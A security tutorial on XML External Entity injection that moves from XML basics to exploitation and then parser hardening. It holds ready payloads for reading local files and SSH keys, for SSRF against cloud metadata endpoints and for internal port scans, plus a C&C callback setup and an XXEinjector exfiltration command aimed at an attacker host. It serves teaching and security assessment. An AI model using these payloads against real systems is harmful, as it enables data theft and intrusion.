Security Field Guide · XML Attack Surface

XML External Entity Injection

Step-by-step from XML basics to blind XXE exploitation, SSRF, and remediation. With analogies, payloads, and assessment guidance.

XML Basics — Structure & Purpose

XML (eXtensible Markup Language) is a text format for storing and transporting structured data. Unlike HTML, it has no predefined tags — you invent your own.

Think of XML like a labeled shipping crate system. Every item goes in a box, the box has a label, and boxes can contain other boxes. The structure is entirely up to whoever builds the warehouse.

XML · Basic structure

<?xml version="1.0" encoding="UTF-8"?>    <!-- XML declaration -->

<order>                                     <!-- root element (exactly ONE) -->
  <customer id="42">                       <!-- element with attribute -->
    <name>Alice</name>
    <email>alice@example.com</email>
  </customer>
  <item qty="3">Widget</item>
</order>

Key Rules

One root element only
All tags must close
Attribute values quoted
Tags are case-sensitive
Proper nesting required
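
A conforming parser enforces each of these rules. The following is a minimal sketch using Python's standard `xml.etree.ElementTree`; the `is_well_formed` helper and the broken sample documents are illustrative names and inputs, not part of the guide.

```python
import xml.etree.ElementTree as ET

ORDER = """<order>
  <customer id="42">
    <name>Alice</name>
    <email>alice@example.com</email>
  </customer>
  <item qty="3">Widget</item>
</order>"""


def is_well_formed(document: str) -> bool:
    """Return True if the parser accepts the document, False otherwise."""
    try:
        ET.fromstring(document)
        return True
    except ET.ParseError:
        return False


root = ET.fromstring(ORDER)
customer_id = root.find("customer").get("id")  # attribute lookup
item_text = root.find("item").text             # element text

# Each broken variant violates exactly one of the key rules.
broken = {
    "two roots": "<a/><b/>",
    "unclosed tag": "<a><b></a>",
    "unquoted attribute": "<a id=42/>",
    "case mismatch": "<a></A>",
    "bad nesting": "<a><b></a></b>",
}
results = {rule: is_well_formed(doc) for rule, doc in broken.items()}
```

Every entry in `results` should come back `False`, while the order document parses cleanly.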

Common Uses

SAML / SSO tokens
SOAP web services
Office file formats (.docx, .xlsx)
SVG images
API responses (legacy)
Config files (Maven, Android)

Schema

A schema defines what's valid: which elements exist, what types they hold, what's required. Think of it as the blueprint the crate-builder must follow.

Formats: XSD (XML Schema Definition), DTD, RelaxNG.

DTD & Entities — The Dangerous Ingredients

A Document Type Definition (DTD) is an older schema format that lives either inside the XML document (internal DTD) or at a URL (external DTD). It defines allowed elements and declares entities — which is where XXE comes from.

An entity is a text macro — like a copy-paste shortcut. You define &company; once, and every time the parser sees it, it substitutes the full value. An external entity fetches that value from a URL or file at parse time.

XML · Internal DTD + entity

<!-- Internal DTD -->
<!DOCTYPE note [
  <!ENTITY author "Alice">
]>

<note>
  Written by &author;   <!-- → "Alice" -->
</note>
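
Internal entities are expanded by most parsers, including ones that refuse external entities. As a small sketch, Python's standard `xml.etree.ElementTree` substitutes the value while building the tree (the `NOTE` document below is a condensed copy of the example above):

```python
import xml.etree.ElementTree as ET

NOTE = """<!DOCTYPE note [
  <!ENTITY author "Alice">
]>
<note>Written by &author;</note>"""

# The parser replaces &author; with the literal declared in the internal DTD.
note_text = ET.fromstring(NOTE).text
```

The application only ever sees the substituted text, which is why entity abuse is invisible to code that runs after parsing.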

XML · External entity (XXE vector)

<!DOCTYPE foo [
  <!ENTITY xxe
    SYSTEM "file:///etc/passwd"
  >
]>

<data>&xxe;</data>
<!-- Parser fetches /etc/passwd
     and inlines it here -->

Entity Type	Syntax	Source	XXE Risk
Internal	`<!ENTITY name "value">`	Literal string in DTD	Low
External (file)	`<!ENTITY name SYSTEM "file:///...">`	Local filesystem	Critical
External (HTTP)	`<!ENTITY name SYSTEM "http://...">`	Remote URL	SSRF
Parameter entity	`<!ENTITY % name SYSTEM "...">`	Used inside DTD only	Blind XXE
Character entity	`&lt; &amp;`	Built-in XML escaping	None
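
When triaging captured requests or uploaded files, it can help to sort entity declarations into the rows of this table. The sketch below is a regex heuristic, not a DTD parser; `classify_entities` and the sample DTD (including the `attacker.example` host) are hypothetical.

```python
import re

# Matches <!ENTITY name "literal"> and <!ENTITY [%] name SYSTEM "uri">.
ENTITY_DECL = re.compile(
    r"<!ENTITY\s+(?P<param>%\s+)?(?P<name>\S+)\s+"
    r"(?:SYSTEM\s+(?P<system>\"[^\"]*\"|'[^']*')"
    r"|(?P<literal>\"[^\"]*\"|'[^']*'))"
)


def classify_entities(dtd: str) -> dict:
    """Map each declared entity name to a row label from the table above."""
    found = {}
    for match in ENTITY_DECL.finditer(dtd):
        if match.group("param"):
            kind = "parameter"
        elif match.group("system") is None:
            kind = "internal"
        else:
            uri = match.group("system")[1:-1].lower()
            if uri.startswith(("http://", "https://")):
                kind = "external (HTTP)"
            else:
                kind = "external (file)"
        found[match.group("name")] = kind
    return found


SAMPLE_DTD = """<!DOCTYPE foo [
  <!ENTITY author "Alice">
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
  <!ENTITY ssrf SYSTEM "http://169.254.169.254/">
  <!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd">
]>"""

classified = classify_entities(SAMPLE_DTD)
```

Anything other than `internal` in the result deserves a closer look.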

When Does Testing for XXE Make Sense?

XXE is relevant wherever an application parses XML that the attacker influences. It's easy to miss because XML is often hidden.

🎯 High-Yield Targets

SOAP endpoints (Content-Type: text/xml)
SAML SSO (SAMLResponse, AuthnRequest)
File upload: .docx, .xlsx, .svg, .xml
APIs accepting application/xml
RSS/Atom feed parsers

🔍 Also Check

JSON endpoints — try changing Content-Type to XML and re-send
PDF generators (often parse SVG/XML internally)
Import/export features (data feeds, configs)
Mobile apps talking to legacy middleware

📋 Assessment Checklist

Identify all XML-accepting endpoints
Check Content-Type headers
Inspect file upload processing
Look for SAML in SSO flows
Test JSON endpoints with XML swap
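
The JSON-to-XML swap from the checklist can be scripted. This is a rough sketch that assumes a flat JSON object and guesses a root element name; `json_to_xml_probe`, the `root` tag, and the `target.example` URL are all hypothetical, and a real backend may expect a different element layout.

```python
import json
import urllib.request
from xml.sax.saxutils import escape


def json_to_xml_probe(url: str, json_body: str, root_tag: str = "root") -> urllib.request.Request:
    """Build (but do not send) a POST that replays a flat JSON body as XML."""
    fields = json.loads(json_body)
    children = "".join(
        f"<{key}>{escape(str(value))}</{key}>" for key, value in fields.items()
    )
    xml_body = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f"<{root_tag}>{children}</{root_tag}>"
    )
    return urllib.request.Request(
        url,
        data=xml_body.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


probe = json_to_xml_probe(
    "http://target.example/api/search", '{"q": "widget", "page": 1}'
)
```

Sending is left to the caller (for example `urllib.request.urlopen(probe)`). A response that differs from the generic "unsupported media type" error suggests the backend has an XML parser wired in.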

How Do XXE Vulnerabilities Arise?

XXE exists because many XML parsers resolve external entities by default, as the XML specification permits. It's a feature, not a bug, until untrusted input hits it.

Imagine a photocopier that can pull documents from any network share and include them in a printout. That's useful internally. But if a visitor hands you an instruction sheet that says "and include the contents of server/secret-plans.docx on page 3" — you have a problem.

Application receives XML

User-controlled data arrives as XML — directly in the body, inside a SOAP envelope, or embedded in a file upload.

Parser processes DOCTYPE without restriction

The XML parser (libxml2, Xerces, .NET XmlDocument, Java SAXParser, etc.) sees a <!DOCTYPE> declaration and — by default — processes it.

External entity is resolved

The parser fetches the external resource (file, URL) and substitutes it into the document tree.

Substituted content ends up in the response

If the application reflects parsed values (e.g., echoes back a field), the attacker sees the file contents. If not → Blind XXE path.

ℹ️

Root cause in one sentence: The application passes attacker-controlled XML to a parser that has external entity processing enabled, then uses the parsed output.
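
The whole chain can be reproduced locally with Python's standard `xml.sax`. This is a sketch under stated assumptions: Python has shipped with external general entities switched off since 3.7.1, so the demo turns the feature on deliberately to mimic a permissive parser. The temp file stands in for a sensitive file, and `TextCollector`, `parse_text`, and `demo_external_entity` are hypothetical names.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects all character data, like an app that echoes a parsed field."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(xml_bytes: bytes, allow_external: bool) -> str:
    parser = xml.sax.make_parser()
    # This single switch decides whether SYSTEM entities are fetched.
    parser.setFeature(feature_external_ges, allow_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


def demo_external_entity():
    """Return (text with entities enabled, text with entities disabled)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = pathlib.Path(tmp) / "secret.txt"
        secret.write_text("TOP-SECRET-TOKEN", encoding="utf-8")
        document = (
            f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{secret.as_uri()}">]>'
            "<data>&xxe;</data>"
        ).encode("utf-8")
        return parse_text(document, True), parse_text(document, False)
```

With the feature enabled the file contents land in the parsed text; with it disabled the entity is skipped and nothing leaks.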

Potential Impact & Limitations

💥 Impact

Local file disclosure — read /etc/passwd, app configs, SSH keys, source code
SSRF — probe internal network, hit cloud metadata endpoints (169.254.169.254)
Blind data exfil — via DNS/HTTP to attacker-controlled server
DoS (Billion Laughs) — nested entity expansion exhausts memory
RCE — rare, but possible via PHP expect:// wrapper

⚠️ Limitations

Files containing < or & break XML parsing → need out-of-band or CDATA tricks
Binary files not readable (not valid XML text)
No response reflection → must use blind techniques
WAFs may block SYSTEM keyword or <!DOCTYPE
Modern parsers (hardened) may have XXE disabled by default

⚠️

CDATA workaround for special characters: Wrap fetched content in a CDATA section via a parameter entity trick (see Blind XXE section) to handle files with XML metacharacters.

Exploit: Reading Local Files

The classic flow: inject a DOCTYPE, define an external entity pointing to a local file, reference it in a value the app echoes back.

1. Find an XML endpoint that reflects input

Look for a field value in the response that mirrors something you sent. E.g., <username>Alice</username> → response contains "Alice".

2. Inject a DOCTYPE with external entity

Prepend (or replace) the DOCTYPE to declare your entity.

3. Reference the entity in the reflected field

Put &xxe; where the echoed value was.

4. Read the response

The file contents appear where the entity was referenced.

XML · BURP · Basic file read payload

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&xxe;</productId>   <!-- reflected field -->
  <storeId>1</storeId>
</stockCheck>

RESPONSE (truncated) · What you get back

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Other useful file targets:

File	What you get
`/etc/passwd`	User list, shells — confirms XXE works
`/etc/hostname`	Machine name — useful for SSRF targeting
`/proc/self/environ`	Environment variables — often contains secrets
`/proc/self/cmdline`	Running process & args
`~/.ssh/id_rsa`	Private SSH key (give the absolute path, e.g. `/root/.ssh/id_rsa`; the parser does not expand `~`)
`/var/www/html/config.php`	App source, DB credentials
`C:\Windows\win.ini`	Windows confirmation payload
`C:\inetpub\wwwroot\web.config`	IIS config, connection strings
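
Swapping targets in and out of the payload is easy to script. The sketch below turns a path from the table into a `file://` URI and drops it into the `stockCheck` payload shown earlier; `to_file_uri` and `build_file_read_payload` are hypothetical helper names, and the element names only apply to that example endpoint.

```python
import re
from urllib.parse import quote
from xml.sax.saxutils import quoteattr


def to_file_uri(path: str) -> str:
    """Convert an absolute Unix or Windows path to a file:// URI."""
    if path.startswith("file://"):
        return path
    if re.match(r"^[A-Za-z]:[\\/]", path):           # e.g. C:\Windows\win.ini
        return "file:///" + quote(path.replace("\\", "/"), safe="/:")
    return "file://" + quote(path)                    # e.g. /etc/hostname


def build_file_read_payload(system_uri: str) -> str:
    """Return the basic file-read payload with the given SYSTEM identifier."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        f"  <!ENTITY xxe SYSTEM {quoteattr(system_uri)}>\n"
        "]>\n"
        "<stockCheck>\n"
        "  <productId>&xxe;</productId>\n"
        "  <storeId>1</storeId>\n"
        "</stockCheck>\n"
    )


targets = ["/etc/hostname", "/proc/self/environ", r"C:\Windows\win.ini"]
payloads = {path: build_file_read_payload(to_file_uri(path)) for path in targets}
```

Each value in `payloads` can be pasted into Burp Repeater or sent by a script.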

Exploit: SSRF via XXE

Instead of file://, use http://. The server's XML parser makes an outbound HTTP request — from inside the network. You can probe internal services, cloud metadata APIs, or anything the server can reach.

You're standing outside a locked building. You can't enter. But you slip a note under the door saying "call this number for me and read me what they say." XXE SSRF is exactly that: you make the server act as your proxy.

XML · AWS metadata endpoint via SSRF

<!DOCTYPE foo [
  <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&ssrf;</data>

XML · Internal network port scan (one-by-one)

<!-- Try systematically; timing difference reveals open vs. closed -->
<!DOCTYPE foo [
  <!ENTITY ssrf SYSTEM "http://192.168.1.1:8080/">
]>
<data>&ssrf;</data>

High-Value SSRF Targets

169.254.169.254 — AWS/GCP/Azure metadata
http://localhost:8080 — admin panels
http://internal-db:5432 — databases
http://elasticsearch:9200/_cat/indices
http://kubernetes.default.svc — k8s API

SSRF Indicators

Error message mentions connection refused → port closed
Timeout → filtered or no route
HTTP 200 with content → open & responding
Burp Collaborator interaction → confirmed outbound
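
The one-by-one port scan and the indicator list can be combined into a small helper. This is a sketch only: `build_ssrf_payload` and `classify_probe` are hypothetical names, the matching on "connection refused" assumes the application surfaces parser errors, and actual request sending and timing are left to the caller.

```python
from typing import Optional


def build_ssrf_payload(host: str, port: int, path: str = "/") -> str:
    """Return an XXE payload that makes the parser request host:port."""
    return (
        "<!DOCTYPE foo [\n"
        f'  <!ENTITY ssrf SYSTEM "http://{host}:{port}{path}">\n'
        "]>\n"
        "<data>&ssrf;</data>\n"
    )


def classify_probe(status: Optional[int], body: str, timed_out: bool) -> str:
    """Apply the SSRF indicators listed above to one observed response."""
    if timed_out:
        return "filtered or no route"
    if "connection refused" in body.lower():
        return "closed"
    if status == 200 and body.strip():
        return "open"
    return "inconclusive"


payloads = {port: build_ssrf_payload("192.168.1.1", port) for port in (22, 80, 8080)}
```

Anything classified as `inconclusive` is a candidate for an out-of-band check via Collaborator.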

XXE Without Modifying DOCTYPE — XInclude & SVG

Sometimes you can't inject a DOCTYPE — because you control only part of the XML (e.g., a value inside a SOAP message), or the server regenerates the DOCTYPE. Two alternatives:

XML · XInclude: inject into a value field

<!-- No DOCTYPE needed.
     XInclude uses a namespace. -->
<foo
  xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include
    parse="text"
    href="file:///etc/passwd"/>
</foo>

ℹ️

Works when you can inject XML into any value that gets parsed. parse="text" is key — without it, the parser tries to parse the file as XML.
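
To see what XInclude processing does on the server side, the behaviour can be reproduced with Python's standard `xml.etree.ElementInclude`. Two assumptions apply: the standard library only processes XInclude when `include()` is called explicitly, and its default loader takes a filesystem path rather than a `file://` URI, so this illustrates the mechanism rather than any particular target parser. The temp file and the helper names are hypothetical.

```python
import pathlib
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude


def expand_xinclude(document: str) -> str:
    """Parse the document, resolve xi:include elements, return all text."""
    root = ET.fromstring(document)
    ElementInclude.include(root)  # replaces xi:include nodes in place
    return "".join(root.itertext())


def demo_xinclude() -> str:
    with tempfile.TemporaryDirectory() as tmp:
        secret = pathlib.Path(tmp) / "secret.txt"
        secret.write_text("TOP-SECRET-TOKEN", encoding="utf-8")
        document = (
            '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
            f'<xi:include parse="text" href="{secret}"/>'
            "</foo>"
        )
        return expand_xinclude(document)
```

No DOCTYPE appears anywhere in the input, yet the file contents end up in the element text.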

SVG Upload · XXE via SVG image upload

<?xml version="1.0"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg
  xmlns="http://www.w3.org/2000/svg">
  <text y="20">&xxe;</text>
</svg>

<!-- Upload as .svg / image/svg+xml
     Content may appear rendered in browser
     or in response if fetched directly -->

Scenario	Technique	Requirement
Full XML body control	Classic DOCTYPE injection	Parser allows external entities
Control a value inside XML	XInclude	Server supports XInclude processing
File upload (image)	SVG with DOCTYPE	Server parses SVG as XML
DOCX/XLSX upload	Modify embedded XML parts	Server opens/processes the file
JSON that becomes XML	Content-Type swap + classic	Backend converts JSON→XML
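
For the DOCX/XLSX row, the file is a ZIP archive, so modifying an embedded XML part is a repack exercise. The sketch below inserts a DOCTYPE right after the XML declaration of one part and leaves the other parts alone. `inject_doctype`, `read_part`, `make_sample_archive`, and the `attacker.example` URL are hypothetical, and the two-part sample archive is a stand-in for a real document.

```python
import io
import zipfile


def inject_doctype(archive: bytes, part: str, doctype: str) -> bytes:
    """Return a copy of the archive with a DOCTYPE added to one XML part."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(archive)) as src:
        with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
            for info in src.infolist():
                data = src.read(info.filename)
                if info.filename == part:
                    text = data.decode("utf-8")
                    if text.startswith("<?xml"):
                        end = text.index("?>") + 2  # keep the declaration first
                        text = text[:end] + "\n" + doctype + text[end:]
                    else:
                        text = doctype + "\n" + text
                    data = text.encode("utf-8")
                dst.writestr(info.filename, data)
    return out.getvalue()


def read_part(archive: bytes, part: str) -> str:
    with zipfile.ZipFile(io.BytesIO(archive)) as z:
        return z.read(part).decode("utf-8")


def make_sample_archive() -> bytes:
    """Tiny stand-in for a .docx: just two XML parts in a ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr(
            "word/document.xml",
            '<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="urn:example"/>',
        )
    return buf.getvalue()


DOCTYPE = '<!DOCTYPE x [<!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd"> %ext;]>'
patched = inject_doctype(make_sample_archive(), "word/document.xml", DOCTYPE)
```

A parameter entity is used here because it fires inside the DTD itself, so no entity reference has to be placed in the document body.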

Exploiting XXE with C&C Infrastructure & Tooling

For blind XXE exfiltration in real engagements, you need an attacker-controlled server for hosting external DTDs and receiving callbacks. Here's a practical workflow using typical ERNW tooling.

Infrastructure Setup

BASH · C&C Server · Serve evil.dtd + log incoming requests

# Minimal Python HTTP server that logs all requests
python3 -m http.server 80

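# Or a bare callback logger (prints each hit to stdout; redirect to a file to keep it.
# Note: it answers every GET with an empty 200, so it does not serve evil.dtd):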
python3 -c "
import http.server, sys
class L(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        print(f'[HIT] {self.path}', flush=True)
        self.send_response(200); self.end_headers()
http.server.HTTPServer(('',80),L).serve_forever()
"

BASH · C&C Server · Capture DNS exfil with tcpdump or dnslog

# Listen for DNS queries (your NS for attacker.com must point here)
tcpdump -i eth0 -n udp port 53 | grep attacker.com

# Or use interactsh-client (open source Burp Collaborator alternative)
interactsh-client -v
# gives you: abc123.oast.fun — use as your callback domain

Tooling Overview

Tool	Use Case	Notes
Burp Suite Pro	Intercept, modify, replay XML; Collaborator for blind OOB	Go-to for manual XXE
Burp Collaborator	DNS/HTTP callback server, auto-correlated	Built into Burp Pro; use `oastify.com` domains
interactsh	Open-source Collaborator alternative	`interactsh-client` CLI
XXEinjector	Automated XXE file enumeration & OOB exfil	Ruby; good for bulk file reads
xmllint	Parse & test DTD structure locally	`xmllint --noent payload.xml`
Python requests	Scripted payload delivery	Set `Content-Type: application/xml`

Full Blind Exfil Workflow

Host evil.dtd on C&C

Place evil.dtd on your C&C server. It reads the target file and sends its contents to your listener as a URL parameter.

Send trigger payload to target

XML body references http://c2.attacker.com/evil.dtd via a parameter entity. Target fetches the DTD.

Target evaluates DTD, reads file, sends callback

Your listener receives GET /?data=root:x:0:0:...%0Adaemon:.... URL-decode the parameter to get the file.

Automate with XXEinjector for bulk reads

ruby XXEinjector.rb --host=c2.attacker.com --file=/burp_request.txt --path=/etc/ --oob=http
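
The URL-decoding in step 3 of the workflow can be sketched as follows. It assumes the callback carries the file in a query parameter named `data`, as in the example request line above; `decode_exfil` is a hypothetical helper.

```python
from urllib.parse import parse_qs, urlsplit


def decode_exfil(request_path: str, param: str = "data") -> str:
    """Extract and URL-decode the exfiltrated value from a logged request path."""
    query = urlsplit(request_path).query
    values = parse_qs(query, keep_blank_values=True).get(param, [])
    return values[0] if values else ""


logged = "/?data=root:x:0:0:root:/root:/bin/bash%0Adaemon:x:1:1:daemon:/usr/sbin"
recovered = decode_exfil(logged)
```

One caveat: `parse_qs` turns a literal `+` into a space, so files containing `+` need a second look at the raw log line.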

Prevention

✅

Primary fix: disable external entity processing in your XML parser. Everything else is defense-in-depth.

1. Disable External Entities

Configure your XML parser to reject external entities and DTD processing. This is the direct fix.

2. Use Safe Data Formats

Prefer JSON for APIs where possible: it has no entity or DTD concept, so the attack surface is smaller. YAML also avoids DTDs but needs a safe loader. Only use XML where necessary.

3. Server-Side Input Validation

Validate that XML conforms to expected schema before parsing. Reject documents with DOCTYPE declarations unless required.

4. Patch & Keep Libraries Current

XML parser libraries regularly patch XXE-related issues. Run npm audit, mvn org.owasp:dependency-check-maven:check, etc. regularly.
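
Rejecting documents that carry a DOCTYPE (point 3 above) can be done before the real parser ever sees the input. This is a minimal sketch using the standard `xml.parsers.expat` module; `DoctypeForbidden`, `assert_no_doctype`, and `is_doctype_free` are hypothetical names, and the check is meant as a gate in front of an already hardened parser, not a replacement for one.

```python
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def assert_no_doctype(xml_bytes: bytes) -> None:
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Abort as soon as the declaration starts; nothing is resolved.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)  # malformed XML raises expat.ExpatError


def is_doctype_free(xml_bytes: bytes) -> bool:
    try:
        assert_no_doctype(xml_bytes)
        return True
    except DoctypeForbidden:
        return False


clean = b"<order><item>Widget</item></order>"
hostile = (
    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<data>&xxe;</data>"
)
```

Here `is_doctype_free(clean)` is `True` and `is_doctype_free(hostile)` is `False`. Because the handler fires on the declaration itself, the entity is never looked up.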

Parser-Specific Hardening

Language / Parser	Safe Configuration
Java (SAXParser)	`factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)`
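Java (DocumentBuilder)	`factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)`; `XMLConstants.FEATURE_SECURE_PROCESSING` alone does not reliably block external entities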
Python (lxml)	`etree.XMLParser(resolve_entities=False, no_network=True)`
Python (defusedxml)	Drop-in safe replacement: `import defusedxml.ElementTree as ET`
.NET (XmlReader)	`XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit }`
PHP (libxml)	`libxml_disable_entity_loader(true)` on PHP < 8.0; deprecated in 8.0+, where libxml ≥ 2.9.0 keeps external entity loading off unless `LIBXML_NOENT` is passed
Node.js (node-expat / libxmljs)	In libxmljs, never pass `noent: true` for untrusted input; prefer `sax` or validated parsers
Ruby (Nokogiri)	`Nokogiri::XML::ParseOptions::NONET`; never set `NOENT`, which turns entity substitution on

PYTHON · Safe XML parsing with defusedxml

# pip install defusedxml
import defusedxml.ElementTree as ET

# Entity declarations (XXE, entity bombs) raise an exception instead of being expanded
tree = ET.parse("user_input.xml")    # safe drop-in
root = tree.getroot()

JAVA · Secure SAX parser setup

SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setFeature(
  "http://apache.org/xml/features/disallow-doctype-decl", true
);
factory.setFeature(
  "http://xml.org/sax/features/external-general-entities", false
);
factory.setFeature(
  "http://xml.org/sax/features/external-parameter-entities", false
);
SAXParser parser = factory.newSAXParser();

🔗

OWASP XML External Entity Prevention Cheat Sheet (cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html): comprehensive parser-by-parser reference.

Quick Payload Reference

Goal	Payload Skeleton
Read local file (inline)	`<!ENTITY x SYSTEM "file:///etc/passwd"> … &x;`
SSRF / internal HTTP	`<!ENTITY x SYSTEM "http://169.254.169.254/...">`
Blind OOB ping	`<!ENTITY x SYSTEM "http://collaborator.id/">`
Blind OOB + file exfil	Parameter entity → external evil.dtd → %file; in URL
Error-based	%file; used in invalid path → error message leaks content
XInclude (no DOCTYPE)	`<xi:include parse="text" href="file:///etc/passwd"/>`
SVG upload	SVG with DOCTYPE + `<text>&xxe;</text>`
DoS (Billion Laughs)	Nested entities: `&lol9;` expands to 10^9 copies of "lol"
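
The Billion Laughs figure is simple arithmetic, which the sketch below works out without expanding anything. It assumes the classic layout, where each of nine entity levels references the previous level ten times; `expanded_size` is a hypothetical helper.

```python
def expanded_size(levels: int = 9, fanout: int = 10, base: str = "lol") -> int:
    """Characters produced when the top-level entity is fully expanded."""
    return len(base) * fanout ** levels


copies = 10 ** 9                       # number of "lol" strings in &lol9;
total_chars = expanded_size()          # 3 characters per copy
total_gib = total_chars / 2 ** 30      # rough in-memory size at 1 byte/char
```

A payload of under a kilobyte therefore asks the parser for roughly 3 billion characters, which is why entity expansion limits matter even when external entities are disabled.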
